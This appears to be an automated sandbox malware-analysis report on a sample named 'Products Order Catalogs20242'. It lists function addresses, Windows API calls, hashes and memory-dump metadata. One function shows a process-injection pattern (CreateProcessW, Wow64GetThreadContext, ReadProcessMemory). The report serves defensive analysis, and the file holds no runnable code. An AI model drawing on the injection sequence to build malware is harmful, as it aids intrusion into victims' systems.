                                                                                                • Instruction Fuzzy Hash: 1162FB30A14219DBEB24CFA4C850BDEB376EF58304F1091A9D10DEB2D1E7799E85CB5A
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 00411734
                                                                                                  • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                  • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                  • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                • __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                • String ID:
                                                                                                • API String ID: 1411284514-0
                                                                                                • Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                                                                                                • Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                                                • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                                                • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 00435278
                                                                                                  • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                  • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                • _malloc.LIBCMT ref: 00435288
                                                                                                • _malloc.LIBCMT ref: 00435298
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _malloc$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 680241177-0
                                                                                                • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                                                                                                • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 00401B71
                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                • String ID: @EXITCODE
                                                                                                • API String ID: 580348202-3436989551
                                                                                                • Opcode ID: 48d001a4b96ee351bc7679959485890c1c6d832d60c6cde5ea273d4c8ab31dfe
                                                                                                • Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
                                                                                                • Opcode Fuzzy Hash: 48d001a4b96ee351bc7679959485890c1c6d832d60c6cde5ea273d4c8ab31dfe
                                                                                                • Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClearVariant
                                                                                                • String ID:
                                                                                                • API String ID: 1473721057-0
                                                                                                • Opcode ID: 4e47f038e922e84c19ecab33a0164ae102939a21ade882e67390b57c38244a2e
                                                                                                • Instruction ID: 1f11e118333250ff1b1cce483c812f274274124743f71e781b8a547d9d3e43da
                                                                                                • Opcode Fuzzy Hash: 4e47f038e922e84c19ecab33a0164ae102939a21ade882e67390b57c38244a2e
                                                                                                • Instruction Fuzzy Hash: 35917E706042009FC714DF55D890A6AB7E5EF89318F14896FF849AB392D738EE41CB9E
                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                                                • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __lock_file_memset
                                                                                                • String ID:
                                                                                                • API String ID: 26237723-0
                                                                                                • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                                                • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                                                APIs
                                                                                                  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                • __lock_file.LIBCMT ref: 00414EE4
                                                                                                  • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                                                • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                • String ID:
                                                                                                • API String ID: 717694121-0
                                                                                                • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                                                                • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                                                                APIs
                                                                                                • TranslateMessage.USER32(?), ref: 004098F6
                                                                                                • DispatchMessageW.USER32(?), ref: 00409901
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$DispatchTranslate
                                                                                                • String ID:
                                                                                                • API String ID: 1706434739-0
                                                                                                • Opcode ID: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                                                • Instruction ID: 6b3a2aeb923af73eb4cdb1bab797699f2cf27729a5018e8568c19fb4e3feaf67
                                                                                                • Opcode Fuzzy Hash: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                                                • Instruction Fuzzy Hash: D4F05471114301AEDA24DBE58D41B5BB3A8AFD8700F408C2EBA51E61C1FBF8E404C76A
                                                                                                APIs
                                                                                                • TranslateMessage.USER32(?), ref: 004098F6
                                                                                                • DispatchMessageW.USER32(?), ref: 00409901
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$DispatchTranslate
                                                                                                • String ID:
                                                                                                • API String ID: 1706434739-0
                                                                                                • Opcode ID: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                                                • Instruction ID: cc4909b6a78c34842ee59a7900970f574117f06624f4f9c7373c79b1fb9dfc76
                                                                                                • Opcode Fuzzy Hash: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                                                • Instruction Fuzzy Hash: DDF054B1114301AADA14DBE58D41B5BB3A4AF94740F408C2EBA11E52C1EBFCD504C71A
                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 040CFA63
                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040CFAF9
                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040CFB1B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1762622283.00000000040CE000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CE000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_40ce000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 2438371351-0
                                                                                                • Opcode ID: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                                                                • Instruction ID: 87fe074c250b936accdb7707e7e07724c9817bbd49a3c8582c404ade78b5c6e6
                                                                                                • Opcode Fuzzy Hash: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                                                                • Instruction Fuzzy Hash: 7612EC20E24658C6EB24DF60D8507DEB272EF68300F1090E9910DEB7A5E77A5E81CB5A
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 544645111-0
                                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0d8ad4d875158e0120ed104e09085659f42b86f6d600f5d33fa38308f41241bf
                                                                                                • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                                                • Opcode Fuzzy Hash: 0d8ad4d875158e0120ed104e09085659f42b86f6d600f5d33fa38308f41241bf
                                                                                                • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                                                APIs
                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProcWindow
                                                                                                • String ID:
                                                                                                • API String ID: 181713994-0
                                                                                                • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                                                • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                                                APIs
                                                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 10892065-0
                                                                                                • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                                                • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                                                APIs
                                                                                                  • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
                                                                                                • WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$PointerWrite
                                                                                                • String ID:
                                                                                                • API String ID: 539440098-0
                                                                                                • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                                                                                • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                                                                                APIs
                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
